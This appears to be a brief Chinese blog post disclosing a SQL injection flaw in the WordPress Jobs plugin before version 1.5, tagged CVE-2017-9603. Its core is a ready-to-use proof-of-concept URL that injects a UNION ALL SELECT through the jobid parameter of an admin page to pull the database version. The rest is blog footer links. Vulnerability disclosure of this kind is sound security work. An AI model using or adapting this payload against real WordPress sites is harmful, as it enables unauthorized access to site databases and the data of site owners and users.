AD

WordPress_Jobs_1.4_SQL_Injection

      WordPress中的job插件,在1.5版本之前,均存在一个sql注入漏洞。

POC:
      http://url/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment

TIPS:
       CVE-2017-9603

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce